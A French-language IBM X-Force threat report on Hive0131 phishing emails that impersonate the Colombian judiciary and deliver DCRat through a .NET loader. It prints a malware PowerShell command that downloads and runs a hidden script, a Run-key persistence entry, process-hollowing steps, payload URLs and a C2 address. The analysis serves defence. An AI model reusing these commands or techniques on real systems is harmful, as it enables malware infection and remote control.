Analyse des menaces IBM X-Force : La présence de DCRat est en hausse en Amérique latine

Une main tapant sur un ordinateur portable avec un bouclier de sécurité rouge et des graphiques d’e-mail survolant le clavier.

Début mai 2025, IBM X-Force a observé que Hive0131 menait des campagnes d’e-mail ciblant les utilisateurs en Colombie avec des notifications électroniques de procédures pénales, prétendant provenir de la Justice colombienne. Hive0131 est un groupe financièrement motivé, probablement originaire d’Amérique du Sud, qui mène régulièrement des campagnes principalement en Amérique latine (LATAM) pour livrer un large éventail de charges utiles courantes. Les campagnes actuelles imitent la correspondance officielle et contiennent soit un lien intégré, soit un leurre PDF avec un lien intégré. Cliquer sur le lien déclenche la chaîne d’infection, exécutant en mémoire le cheval de Troie bancaire « DCRat ». 

DCRat, exploité comme logiciel malveillant à la demande (MaaS), est apparu pour la première fois en 2018, peut-être avant. Il largement promu sur les forums russes de cybercriminalité et proposé sur abonnement au tarif de 7 dollars USD environ pour deux mois. La présence de DCRat est très importante, et sa popularité ne cessé de croître en Amérique latine depuis 2024, voire avant. Au cours de l’été 2024, X-Force a observé plusieurs campagnes ciblant fortement des entités en Colombie, toutes imitant une entreprise LATAM spécialisée dans les écosystèmes de documents électroniques au Mexique et en Colombie. Toutefois, compte tenu des différences dans la chaîne d’infection et la fourniture de DCRat, X-Force pense que les campagnes de 2024 et celles d’aujourd’hui ont été menées par des acteurs différents. Les campagnes observées en 2024 s’appuyaient fortement sur des fichiers RAR protégés par mot de passe contenant des NSIS pour exécuter un téléchargeur GuLoader, alors que les campagnes récentes reposent sur un chargeur .NET dissimulé que nous avons appelé VMDetectLoader. 

Capacités DCRat

  • Contourne l’AMSI
  • Détecte les environnements d’analyse
  • Met fin aux processus figurant sur la liste de blocage
  • Obtient la persistance grâce à une tâche planifiée ou à une clé de registre
  • Écoute les commandes provenant d’un serveur de commande et de contrôle (C2)

DCRat s’accompagne de plug-in capables d’effectuer les tâches suivantes, bien que les acteurs de la menace puissent créer des plug-in personnalisés pour accomplir des tâches supplémentaires :

  • Enregistrer une victime par le biais du microphone ou de la caméra de l’ordinateur
  • Télécharger des fichiers
  • Exécution de commandes
  • Obtenir des informations sur le système
  • Chiffrer et déchiffrer les fichiers
  • Modifier les clés de registre
  • Journaliser les frappes et les données du presse-papiers
  • Manipuler le système de fichiers

Type de menace

MaaS

Homme regardant un ordinateur

Analyse

Début mai 2025, X-Force a observé des campagnes d’e-mails de Hive0131 imitant le pouvoir judiciaire de Colombie (Rama Judicial de Colombia), prétendant provenir du circuit civil de Bogota, en Colombie, pour envoyer des notifications électroniques de procédures pénales. Les campagnes observées contiennent soit un appât PDF avec un lien vers une TinyURL, soit un lien intégré vers un emplacement Google Docs. 

Aperçu de la chaîne d’infection - PDF avec TinyURL

Pour les e-mails contenant un appât PDF menant à une tinyurl, la victime est redirigée vers une archive ZIP nommée 1Juzgado 08 Civil Circuito de Bogotá Notificacion electronica Orden de Embargo.Uue. L’archive ZIP contient des fichiers inoffensifs, ainsi qu’un fichier JavaScript malveillant nommé 1Juzgado 08 Civil Circuito de Bogotá Notificacion electronica Orden de Embargo.js. Le fichier JavaScript télécharge une charge utile JavaScript à partir d’un site paste[.]ee. et l’exécute. Cette charge utile exécute ensuite une commande PowerShell qui télécharge un fichier JPG à partir de hxxps://archive[.]org/download/new_ABBAS/new_ABBAS.jpg avec un chargeur encodé en base64 ajouté à la fin du fichier. Une fois exécuté, le chargeur télécharge et exécute DCRat en mémoire.

Le chargeur porte le nom de VMDetectLoader en raison de sa capacité à déterminer s’il s’exécute dans un environnement de bac à sable. L’analyse indique que le chargeur est basé sur le projet open source https://github.com/robsonfelix/VMDetector.

Chaîne d’infection RAMA
Figure 1 : Chaîne d’infection RAMA
Exemple d’e-mail avec appât PDF
Figure 2 : Exemple d’e-mail avec appât PDF

Vue d’ensemble de la chaîne d’infection - Lien Google Docs intégré

Cette chaîne d’infection est déclenchée par des emails d’hameçonnage contenant un lien vers un téléchargement Google Docs d’une archive ZIP protégée par mot de passe et nommée CUI 158616000129-2025-10047_122011111777.zip, dont le mot de passe figure dans l’email et est 3004. L’archive contient un téléchargeur de fichiers batch, CUI 158616000129-2025-10047_122011111777.bat, qui télécharge et exécute un composant VBScript (VBS) dissmulé à partir dehxxp://paste[.]ee/d/jYHEqBJ3/0  vers %WinDir%\Temp\Pernambuco.vbs. Le script VBS décode et exécute ensuite un script PowerShell codé en base64 qui télécharge VMDetectLoader via un fichier JPG à partir dehxxps://ia601205.us.archive[.]org/26/items/new_image_20250430/new_image[.]jpg
La charge utile finale est ensuite téléchargée par VMDetectLoader via un paste[.]ee URL qui lui a été transmise par le script PowerShell.

Chaîne d’infection RAMA avec Google Docs
Figure 3 : Chaîne d’infection RAMA avec Google Docs
Exemple d’e-mail avec lien Google Docs
Figure 4 : Exemple d’e-mail avec lien Google Docs

VMDetectLoader

VMDetectLoader est un chargeur .NET dissimulé (Microsoft.Win32.TaskScheduler.dll) qui se trouve sur VirusTotal à l’adresse https://www.virustotal.com/gui/file/0df13fd42fb4a4374981474ea87895a3830eddcc7f3bd494e76acd604c4004f7. L’analyse des métadonnées du chargeur indique que le code est basé sur le projet open-source https://github.com/robsonfelix/VMDetector.

Attributs d’assemblage :

[assembly: AssemblyVersion("1.1.0.0")]
[assembly: CompilationRelaxations(8)]
[assembly: RuntimeCompatibility(WrapNonExceptionThrows = true)]
[assembly: Debuggable(DebuggableAttribute.DebuggingModes.Default |
DebuggableAttribute.DebuggingModes.DisableOptimizations |
DebuggableAttribute.DebuggingModes.IgnoreSymbolStoreSequencePoints |
DebuggableAttribute.DebuggingModes.EnableEditAndContinue)]
[assembly: AssemblyTitle("VMDetector")]
[assembly: AssemblyCompany("Robson Felix")]
[assembly: AssemblyProduct("VMDetector")]
[assembly: AssemblyCopyright("Copyright © Robson Felix 2017")]
[assembly: AssemblyTrademark("")]
[assembly: TargetFramework(".NETFramework,Version=v4.5", FrameworkDisplayName = "")]
[assembly: SecurityPermission(SecurityAction.RequestMinimum, SkipVerification = true)]

Avant de charger la charge utile, le chargeur détecte les machines virtuelles, imprimant une liste d’attributs hôtes sur la console si une VM est détectée. Par exemple :

MOTHERBOARD INFO
================
Availability = 3
Caption = Motherboard
ConfigManagerErrorCode =
ConfigManagerUserConfig =
CreationClassName = Win32_MotherBoardDevice
Description = Motherboard
DeviceID = Motherboard
ErrorCleared =
ErrorDescription =
InstallDate =
LastErrorCode =
Name = Motherboard
PNPDeviceID =
PowerManagementCapabilities =
PowerManagementSupported =
PrimaryBusType = PCI
RevisionNumber =
SecondaryBusType = ISA
Status = OK
StatusInfo =
SystemCreationClassName = Win32_ComputerSystem
SystemName = DESKTOP-LettersNumbers

--------------------------------------------------------------
Asserting ?
Detected as virtual machine given key computer information.
Detected as virtual machine given bios information.
Detected as virtual machine given hard disk information.
Detected as virtual machine given PnP devices information.
Detected as virtual machine given Windows services information.

watsonx.data

VMDetectLoader est exécuté via sa dnlib.IO.Home.VAI()  fonction et les données transmises comme suit. Ces informations peuvent varier selon la campagne.

[dnlib.IO.Home].GetMethod('VAI').Invoke($null, [object[]]
@($storeman,'','','','MSBuild','','','','','C:\Users\Public\Downloads','rhabdo
'rhabdosteus','js','','','bimetallism','1',''));

Argument

Description

$storeman

 URL inversée de Pastee à partir de laquelle une charge utile codée en base64 est téléchargée. 

MSBuild

 Processus d’injection dans la cible

C: \Utilisateurs\Public\Téléchargements
rhabdosteus
js

 Chemin utilisé pour créer une tâche planifiée : 

C:\Utilisateurs\Public\Téléchargements\rhabdosteus.js

1

 Indicateur signalant les contrôles de processus

bimétallisme

 Nom de la tâche planifiée

Au cours de l’exécution, VMDetectLoader, XOR déchiffre les chaînes notables selon les besoins à partir de la ressource .NET « hIXS ».

Un exemple de chaînes déchiffrées dans les dossiers

Exemples de chaînes déchiffrées

vmware
Microsoft Virtual PC
{{ A = {0}, B = {1} }}
--------------------------------------------------------------
Microsoft Hyper-V
qemu
vbox
VirtualBox
BiosCharacteristics
{{ A = {0}, B = {1}, C = {2} }}
SYSTEM\CurrentControlSet\Services\
Caption
{{ A = {0}, B = {1}, C = {2}, D = {3}, E = {4}, F = {5}, G = {6}, H = {7}, I =
{8} }}
Win32_ComputerSystem
OEMStringArray
Win32_BIOS
Win32_MotherboardDevice
Win32_PnPEntity
Win32_DiskDrive
MOTHERBOARD INFO
================
BIOS INFO
=========
COMPUTER INFO
=============
DEVICES INFO
============
HARD DRIVES INFO
WINDOWS SERVICES
virtual
ImagePath
name
.exe
Name
Manufacturer
Model
Description
Detected as virtual machine given PnP devices information.
Detected as virtual machine given processes information.
Detected as virtual machine given Windows services information.

Persistance

Si cette option est configurée, une tâche planifiée est créée pour exécuter la commande PowerShell suivante, qui télécharge et exécute une charge utile JavaScript :

-NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "Invoke-
WebRequest -Uri '' -OutFile 'C:\Users\Public\Downloads\rhabdosteus.js'; Start-
Process 'C:\Users\Public\Downloads\rhabdosteus.js'"

Une autre tâche peut être créée, selon la configuration, pour exécuter la charge utile JavaScript à l’aide de la commande suivante :

wscript.exe C:\Users\Public\Downloads\rhabdosteus.js

Le chargeur peut également créer une clé d’exécution du registre pour exécuter la charge utile :

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run = <payload>.js

Injection de processus

VMDetectLoader a la capacité d’utiliser la technique d’injection appelée « process hollowing » pour charger une charge utile dans différentes instances de processus cibles. Par exemple, pour la campagne analysée, le processus cible est C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe (32-bit) ou C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe (64-bit). La fonction responsable de l’injection de processus est nommée HackForums.gigajew.x64.Load() pour les échantillons 64 bits, et dnlib.IO.Tools.Ande() pour les échantillons 32 bits.

Procédé d’injection process hollowing :

  1. Créez un processus suspendu en utilisant CreateProcess() avec dwCreationFlags défini sur CREATE_SUSPENDED (4).
  2. Dissocier la mémoire dans le processus cible à l’aide de ZwUnmapViewOverSection().
  3. Allouer une nouvelle mémoire dans le processus cible à l’aide de VirtualAllocEx().
  4. Inscrire la charge utile dans la mémoire nouvellement allouée en utilisant WriteProcessMemory().
  5. Mettre à jour le point d’entrée du processus en utilisant GetThreadContext() et SetThreadContex().
  6. Exécuter ResumeThread() pour exécuter le code.

DCRat

Si VMDetectLoader détermine qu’il s’exécute dans un environnement sûr, la charge utile finale est chargée grâce à la technique de process hollowing. Dans ce cas précis, la charge utile finale est DCRat avec les données de configuration suivantes.

----- File: Client.exe -----
Field         Value
------------  ----------------------------------------------------------------
Parser        acce:DcRat
File Path
Description   DcRat Implant (qwqdanchun)
Architecture  x86
MD5           eeed02e7ebbfe382b3d3af40fffb9ceb
SHA1          f2f9b1205bfcccb738b03531a8bce39478443463
SHA256        1603c606d62e7794da09c51ca7f321bb5550449165b4fe81153020021cbce140
Compile Time  2021-05-05T21:11:39+00:00

---- Encryption Key ----
Tags           Key                                                                                           
Algorithm    Mode
-------------  ----------------------------------------------------------------------------------------------------  -----------  ------
configuration 
0x8cbd5d207b2b4ab52e36e1f749dac6c91bc7993ce3f926bc51f200db2c2cc3ab   
AES          CBC
configuration 
0xc801bfee49bb3da4722a6c6f67d6bd52e4cc5b6e00f6655c80f1d0b7e823341b229b274527da
ca070bf4659624c77d2819 HMAC-SHA256
                 0f2f5c75e985d9a1d59f72086b8811

---- Interval ----
  Value
-------
      1

---- Mutex ----
Value
---------------------
DcRatMutex_qwqdanchun
---- RSA Public Key ----
Tags              Value
----------------  -------------------------------------------------
x509_certificate  Modulus (n):

                      81:cf:a3:d5:04:94:07:91:c3:77:12:18:5b:ae:d3:
                      8b:66:ba:dd:aa:55:39:a2:f4:9a:e0:8b:f1:aa:4b:
                      49:e1:5e:67:69:ed:d1:e2:1d:ab:6b:f8:ef:0a:CB:
                      a9:05:6d:1c:37:39:de:2a:a2:b3:c4:e3:cb:be:56:
                      53:c7:bb:01:8c:59:20:c7:5a:fb:0d:ba:f8:ac:aa:
                      eb:29:bc:ef:9b:2b:03:53:e0:d8:5a:db:a9:56:5f:
                      e1:84:c8:4e:91:69:82:4d:e1:d3:b7:42:e2:f4:07:
                      14:fa:c1:c7:7a:83:6d:99:26:5f:f4:ba:e8:05:1a:
                      74:9b:24:49:b4:49:1b:4d
                  Public Exponent (e):
                      65537 (0x10001)

---- Socket ----
Tags    Address               Port  Network Protocol
------  ------------------  ------  ------------------
c2      feb18.freeddns.org    8848  TCP

---- Version ----
Value
-------
1.0.7
---- Miscellaneous ----
Key                             Value
------------------------------  ----------------------------------------------------------------------------------------------------
BSOD                            False
group                           ::: 30  :::
AntiProcess                     False
Anti                            False
self_installation_flag          False
x509_certificate_serial_number 
1073276135051967865277505007812279690413261813057
server_signature               
b"\x1a\xebHiD\x1d\xa5\x04\xa4\xce\xb4\xd8=9\x08d\xfa\xe2\xdeT\x14T\xdbX\x00\x1
x12<}\x7f\x91E7*r%f\xcei

\xde\x9d\xd9\x93\x08\xce\xc9\x8c\x1c\x98\x9e_O@j\xc0\xcb\x9a\x00)_\x05\x15M\xe
xe2\x9eg\x05a0p-\xac\x

11\xdd\xac\x7fa\x9e\xbc\x96\xc6F\xc6\xd426\x82\x16\x1d\x8c0\x95N\x0c\x19\x10\x
xb24\xa8\x9aRW'\x10E\
                                  xb3\xc3\xb5\x8d\x04-
-\xdb#\xc7\x9fW\x0c\x93\x91\x004\x16vq\xb5U|\xa8r"
server_signature_valid          True

---- Logs ----
[+] File Client.exe identified as DcRat Implant (qwqdanchun).
[+] Starting parser DcRat Implant (qwqdanchun) on sample Client.exe. Expected
results include c2 socket addresses, a version, a mutex, aes-cbc decryption
parameters, an SSL certificate and server signature, an interval, varying
flags, and possibly a filepath and a group.
[-] Cannot update settings field 0400000f.
[+] A dead-drop resolver URL is not set in the configuration.
[+] Completed parsing using DcRat Implant (qwqdanchun) for sample Client.exe.

----- File Tree -----
<Client.exe (eeed02e7ebbfe382b3d3af40fffb9ceb) : DcRat Implant (qwqdanchun)>

Conclusion

X-Force suit plusieurs groupes de cybercriminels actifs en Amérique latine, qui mènent des campagnes par e-mail diffusant des MaaS dans le but de gagner de l’argent. Parmi les groupes suivis figurent Hive0148 et Hive0149, qui se concentrent sur la diffusion du cheval de Troie bancaire Grandoriero, Hive0153 qui diffuse les logiciels malveillants Adwind et SambaSpy, et Hive0131. Si Hive0131 se concentre généralement sur les opérations de diffusion de logiciels malveillants tels que QuasarRAT et NjRAT, X-Force a observé une recrudescence des campagnes impliquant DCRat. S’appuyant sur une observation constante des logiciels malveillants envoyés à des utilisateurs en Amérique latine, IBM X-Force estime que l’Amérique latine continuera d’être ciblée par des acteurs de la menace cherchant à déployer des chevaux de Troie bancaires par le biais de campagnes d’hameçonnage dans le but d’obtenir des identifiants et d’autres informations sensibles.

Recommandations

Les entités implantées en Amérique latine sont invitées à faire preuve de prudence face aux e-mails contenant des pièces jointes, des liens ou qui invitent à télécharger des fichiers. En outre, il est conseillé aux entités de prendre les mesures suivantes :

  • Faire preuve de vigilance face aux emails contenant des liens ou des invites de téléchargement
  • Surveiller les preuves d’injection de processus au niveau de l’hôte, la création de processus malveillants, la création de tâches planifiées et les modifications de registre
  • Installer, mettre à jour et configurer les logiciels de sécurité des points de terminaison
  • Surveillez les règles des terminaux
  • Rechercher les cas de contournement des politiques d’exécution

Indicateurs de compromission

Indicateur

 Type d’indicateur

  Contexte

4ce1d456fa8831733ac01c4a2a32044b6581664d3
11b8791bb2efaa2a1d01f17

 SHA256x

 Fichier vecteur 

6a632d8356f42694adb21c064aa9e8710b65addd
fdf2209d293ded12fe3d46a7

 SHA256x

 Archive ZIP

1603c606d62e7794da09c51ca7f321bb555044916
5b4fe81153020021cbce140

 SHA256x

 DCRat

ceb88c09069b5ddc8ca525b7f2e26c4852465bc0
ed7c665df39c646287a2f17e    

 SHA256x

 JS

0df13fd42fb4a4374981474ea87895a3830eddcc7f3
bd494e76acd604c4004f7

 SHA256x

 Chargeur .NET dissimulé

db21cc64fb7a7ed9075c96600b7e7e7007a0df7cb8
37189c6551010a6f828590

 SHA256x

 Archive ZIP

3c95678d140825b56e04298ce6238ce22b34611d25
82ac736c909296ca137ed1

 SHA256x

 Script PS

7c3fbea63b7cdf013ef26831bb1850c80f4bfad0103328
de106b3d5491372ccf

 SHA256x

 Script PS

b16588e0e2c6a0c8ff080ded57abe8159008d040ae
a78b2e801c17ce79f05863

 SHA256x

 Téléchargeur de scripts batch

hxxps://tinyurl[.]com/2ypy4jrz?id=5541213d-0ed8
-4516-82e7-5460d4ebaf3b

 URL

 Lien PDF intégré

hxxp://paste[.]ee/d/bx699sF9/0

 URL

 URL de téléchargement de la charge utile

hxxps://docs[.]google[.]com/uc?export=download&id=1aJuQtm8YUqZv12E-atslt_GvBWZ
NbWIK

 URL

 Lien e-mail intégré

hxxp://paste[.]ee/d/jYHEqBJ3/0

 URL

 URL de téléchargement de la charge utile

hxxps://archive[.]org/download/new_ABBAS/new_
ABBAS.jpg

 URL

 URL de téléchargement JPG

hxxps://ia601205.us.archive[.]org/26/items/new_
image_20250430/new_image.jpg

   URL

 URL de téléchargement JPG

IBM X-Force Premier Threat Intelligence est désormais intégré à OpenCTI, fournissant des renseignements opérationnels exploitables sur cette activité malveillante et bien plus encore. Accédez à des informations sur les acteurs de la menace, les logiciels malveillants et les risques sectoriels. Installez le OpenCTI Connector pour améliorer la détection et la réponse, en renforçant votre cybersécurité grâce à l’expertise d’IBM X-Force. Gardez une longueur d’avance –intégrez-le dès aujourd’hui.

